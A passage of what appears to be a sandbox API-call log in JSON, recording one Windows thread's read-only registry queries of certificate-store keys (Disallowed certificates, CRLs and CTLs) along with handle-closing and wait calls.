"\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2334 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000638" + } + ], + "repeated": 0, + "id": 2335 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000638" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000518" + }, + { + "name": "ObjectAttributesName", + "value": "CTLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA\\CTLs" + } + ], + "repeated": 0, + "id": 2336 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000638" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2337 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000638" + } + ], + "repeated": 0, + "id": 2338 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8c89", + "parentcaller": "0x767f0c49", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 2339 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8c89", + "parentcaller": "0x767f0c49", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000568" + }, + { + "name": "Milliseconds", + "value": "0" + } + ], + "repeated": 0, + "id": 2340 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8c89", + "parentcaller": "0x767f0c49", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 2341 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8c89", + "parentcaller": "0x767f0c49", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000574" + }, + { + "name": "Milliseconds", + "value": "0" + } + ], + "repeated": 0, + "id": 2342 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8c89", + "parentcaller": "0x767f0c49", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 2343 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8c89", + "parentcaller": "0x767f0c49", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000580" + }, + { + "name": "Milliseconds", + "value": "0" + } + ], + "repeated": 0, + "id": 2344 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8c89", + "parentcaller": "0x767f0c49", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 2345 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8c89", + "parentcaller": "0x767f0c49", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000058c" + }, + { + "name": "Milliseconds", + "value": "0" + } + ], + "repeated": 0, + "id": 2346 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8c89", + "parentcaller": "0x767f0c49", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 2347 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8c89", + "parentcaller": "0x767f0c49", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000005a8" + }, + { + "name": "Milliseconds", + "value": "0" + } + ], + "repeated": 0, + "id": 2348 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8c89", + "parentcaller": "0x767f0c49", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 2349 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8c89", + "parentcaller": "0x767f0c49", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000005b4" + }, + { + "name": "Milliseconds", + "value": "0" + } + ], + "repeated": 0, + "id": 2350 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8c89", + "parentcaller": "0x767f0c49", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 2351 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8c89", + "parentcaller": "0x767f0c49", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000005c0" + }, + { + "name": "Milliseconds", + "value": "0" + } + ], + "repeated": 0, + "id": 2352 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8c89", + "parentcaller": "0x767f0c49", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 2353 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8c89", + "parentcaller": "0x767f0c49", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000005cc" + }, + { + "name": "Milliseconds", + "value": "0" + } + ], + "repeated": 0, + "id": 2354 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8c89", + "parentcaller": "0x767f0c49", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 2355 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8c89", + "parentcaller": "0x767f0c49", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000005d8" + }, + { + "name": "Milliseconds", + "value": "0" + } + ], + "repeated": 0, + "id": 2356 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8c89", + "parentcaller": "0x767f0c49", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 2357 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8c89", + "parentcaller": "0x767f0c49", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000005f0" + }, + { + "name": "Milliseconds", + "value": "0" + } + ], + "repeated": 0, + "id": 2358 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8c89", + "parentcaller": "0x767f0c49", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 2359 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8c89", + "parentcaller": "0x767f0c49", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000005fc" + }, + { + "name": "Milliseconds", + "value": "0" + } + ], + "repeated": 0, + "id": 2360 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8c89", + "parentcaller": "0x767f0c49", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 2361 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8c89", + "parentcaller": "0x767f0c49", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Status", + "value": "Small log limit reached" + } + ], + "repeated": 0, + "id": 2362 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8c89", + "parentcaller": "0x767f0c49", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 4, + "id": 2363 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000644" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000520" + }, + { + "name": "ObjectAttributesName", + "value": "Certificates" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates" + } + ], + "repeated": 0, + "id": 2364 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000644" + }, + { + "name": "KeyInformation", + "value": "\\x1fi\\xffcb\\xfff4\\x0e~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2365 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000644" + } + ], + "repeated": 0, + "id": 2366 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000644" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000520" + }, + { + "name": "ObjectAttributesName", + "value": "CRLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs" + } + ], + "repeated": 0, + "id": 2367 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000644" + }, + { + "name": "KeyInformation", + "value": "\\x1fi\\xffcb\\xfff4\\x0e~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2368 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000644" + } + ], + "repeated": 0, + "id": 2369 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000644" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000520" + }, + { + "name": "ObjectAttributesName", + "value": "CTLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs" + } + ], + "repeated": 0, + "id": 2370 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000644" + }, + { + "name": "KeyInformation", + "value": "\\x1fi\\xffcb\\xfff4\\x0e~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2371 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000644" + } + ], + "repeated": 0, + "id": 2372 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000648" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000524" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed" + } + ], + "repeated": 0, + "id": 2373 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000064c" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000648" + }, + { + "name": "ObjectAttributesName", + "value": "Certificates" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates" + } + ], + "repeated": 0, + "id": 2374 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000064c" + }, + { + "name": "KeyInformation", + "value": "\\xff91\\xffe05\\x04\\x11~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2375 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000064c" + } + ], + "repeated": 0, + "id": 2376 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000064c" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000648" + }, + { + "name": "ObjectAttributesName", + "value": "CRLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs" + } + ], + "repeated": 0, + "id": 2377 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000064c" + }, + { + "name": "KeyInformation", + "value": "\\xff91\\xffe05\\x04\\x11~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2378 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000064c" + } + ], + "repeated": 0, + "id": 2379 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000064c" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000648" + }, + { + "name": "ObjectAttributesName", + "value": "CTLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs" + } + ], + "repeated": 0, + "id": 2380 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000064c" + }, + { + "name": "KeyInformation", + "value": "\\xff91\\xffe05\\x04\\x11~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2381 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000064c" + } + ], + "repeated": 0, + "id": 2382 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767e8258", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000648" + } + ], + "repeated": 0, + "id": 2383 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000654" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000528" + }, + { + "name": "ObjectAttributesName", + "value": "Certificates" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates" + } + ], + "repeated": 0, + "id": 2384 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000654" + }, + { + "name": "KeyInformation", + "value": "#\\x0fk%\\xffdf\\xffac\\xffd5\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2385 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000654" + } + ], + "repeated": 0, + "id": 2386 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000654" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000528" + }, + { + "name": "ObjectAttributesName", + "value": "CRLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs" + } + ], + "repeated": 0, + "id": 2387 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000654" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2388 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000654" + } + ], + "repeated": 0, + "id": 2389 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000654" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000528" + }, + { + "name": "ObjectAttributesName", + "value": "CTLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs" + } + ], + "repeated": 0, + "id": 2390 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000654" + }, + { + "name": "KeyInformation", + "value": "\\xffa0\\xfff9q%\\xffdf\\xffac\\xffd5\\x01\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00P\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2391 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fd269", + "parentcaller": "0x756ac71b", + "category": "registry", + "api": "NtEnumerateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000654" + }, + { + "name": "Index", + "value": "0" + } + ], + "repeated": 0, + "id": 2392 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000658" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000654" + }, + { + "name": "ObjectAttributesName", + "value": "27748148BBE67A43CDBFEC6C3784862CE134E6EA" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs\\27748148BBE67A43CDBFEC6C3784862CE134E6EA" + } + ], + "repeated": 0, + "id": 2393 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffff80000005", + "pretty_return": "BUFFER_OVERFLOW", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000658" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs\\27748148BBE67A43CDBFEC6C3784862CE134E6EA\\Blob" + } + ], + "repeated": 1, + "id": 2394 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fc63b", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000658" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "Type", + "value": "3", + "pretty_value": "REG_BINARY" + }, + { + "name": "Information", + "value": 